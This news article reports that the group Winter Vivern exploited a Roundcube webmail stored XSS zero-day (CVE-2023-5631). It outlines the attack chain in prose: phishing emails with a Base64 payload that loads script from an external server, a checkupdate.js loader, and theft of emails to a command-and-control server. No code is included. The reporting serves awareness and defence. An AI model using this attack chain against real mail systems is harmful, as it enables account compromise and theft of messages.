Zero-Day Vulnerability in Roundcube Webmail Software Exploited by Nation State Hackers

    Winter Vivern’s New Exploitation Technique

    Winter Vivern, an adversarial collective linked to Belarus and Russia, exploited a recent zero-day vulnerability in Roundcube webmail software on October 11, 2023. This breach let them access victims’ email accounts and pull out messages. Matthieu Faou, an ESET security researcher, highlighted this new method by Winter Vivern. Before this, the group mainly exploited known vulnerabilities in Roundcube and Zimbra.

    Previous Exploits and Their Targets

    Known by other names such as TA473 and UAC-0114, Winter Vivern has a history of cyberattacks. Their targets include Ukraine, Poland, and government entities in Europe and India. They had exploited a different flaw in Roundcube, labelled CVE-2020-35730. This made them the second nation-state group after APT28 to target this specific open-source webmail software.

    Details on the Recent Vulnerability

    The new vulnerability, tagged as CVE-2023-5631, is a stored cross-site scripting flaw. It got a CVSS score of 5.4. Attackers could inject arbitrary JavaScript code with this flaw, compromising Roundcube’s security. Roundcube released a patch for this flaw on October 14, 2023.

    Attack Mechanics of Winter Vivern

    Winter Vivern uses a distinct attack method. They send out phishing emails with a Base64-encoded payload. When decoded, it triggers a JavaScript injection from an external server. This exploit uses the XSS flaw, allowing the loading of arbitrary JavaScript code in the victim’s browser without manual intervention.

    After the JavaScript code runs, a second-stage JavaScript loader, named checkupdate.js, kicks in. It then runs a final JavaScript payload. This last step lets Winter Vivern send email messages to its command-and-control server. Winter Vivern remains a major threat to European governments despite using relatively simple tools. Their consistent phishing campaigns and the high number of outdated, vulnerable online apps make them formidable.

    Latest articles

    Related articles